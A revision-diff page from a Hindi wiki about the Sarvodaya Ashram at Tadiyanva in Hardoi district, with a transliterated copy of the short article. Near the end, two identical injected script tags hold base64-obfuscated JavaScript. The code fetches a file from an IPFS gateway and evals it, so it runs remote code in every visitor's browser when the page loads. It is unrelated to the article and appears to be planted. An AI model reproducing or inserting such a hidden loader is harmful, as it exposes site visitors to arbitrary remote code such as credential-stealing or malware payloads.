Difference between revisions of "सर्वोदय आश्रम टडियांवा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('<!-- सबसे पहले इस पन्ने को संजोएँ (सेव करें) जिससे आपको य...' के साथ नया पन्ना बनाया)
 
Line 3: Line 3:
 
{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न करें)। इसके नीचे से ही सम्पादन कार्य करें। -->
 
{{पुनरीक्षण}}<!-- कृपया इस साँचे को हटाएँ नहीं (डिलीट न करें)। इसके नीचे से ही सम्पादन कार्य करें। -->
 
'''आपको नया पन्ना बनाने के लिए यह आधार दिया गया है'''
 
'''आपको नया पन्ना बनाने के लिए यह आधार दिया गया है'''
हरदोई जनपद मुख्यालय से लगभग चालीस किलोमीटर दूर टडियांवा नामक स्थान हैं जहां पर आचार्य विनोवा भावे और महात्मा गांधी के दर्शन से प्रेरित इस आश्रम की नीव प्रसिद्ध समाजसेवी रमेश भाई और उर्मिला बहन द्वारा 1984 में रखी गयी।  इस आश्रम पसिर में हथकरघा कार्यो के अतिरिक्त छात्र छात्राओं के आवासीय विद्यालय का संचालन भी किया जाता है। दिनांक 1 जनवरी 2013 से यह आश्रम [[हरदोई]] स्थित गांधी भवन में स्थापित प्रार्थना कक्ष में नियमित सर्वधर्म प्रार्थना भी सम्पन्न करा रहा है।
+
हरदोई जनपद मुख्यालय से लगभग चालीस किलोमीटर दूर टडियांवा नामक स्थान हैं जहां पर आचार्य [[विनोवा भावे]] और [[महात्मा गांधी]] के दर्शन से प्रेरित इस आश्रम की नीव प्रसिद्ध समाजसेवी रमेश भाई और उर्मिला बहन द्वारा 1984 में रखी गयी।  इस आश्रम पसिर में हथकरघा कार्यो के अतिरिक्त छात्र छात्राओं के आवासीय विद्यालय का संचालन भी किया जाता है। दिनांक 1 जनवरी 2013 से यह आश्रम [[हरदोई]] स्थित गांधी भवन में स्थापित प्रार्थना कक्ष में नियमित सर्वधर्म प्रार्थना भी सम्पन्न करा रहा है।
  
 
===शीर्षक उदाहरण 2===
 
===शीर्षक उदाहरण 2===

Revision as of 02:44, 17 January 2013

thumb|sarvoday ashram tadiyaanva liank par klik karake chitr apalod karean

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

apako naya panna banane ke lie yah adhar diya gaya hai haradoee janapad mukhyalay se lagabhag chalis kilomitar door tadiyaanva namak sthan haian jahaan par achary vinova bhave aur mahatma gaandhi ke darshan se prerit is ashram ki niv prasiddh samajasevi ramesh bhaee aur urmila bahan dvara 1984 mean rakhi gayi. is ashram pasir mean hathakaragha karyo ke atirikt chhatr chhatraoan ke avasiy vidyalay ka sanchalan bhi kiya jata hai. dinaank 1 janavari 2013 se yah ashram haradoee sthit gaandhi bhavan mean sthapit prarthana kaksh mean niyamit sarvadharm prarthana bhi sampann kara raha hai.

shirshak udaharan 2

shirshak udaharan 3

shirshak udaharan 4
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh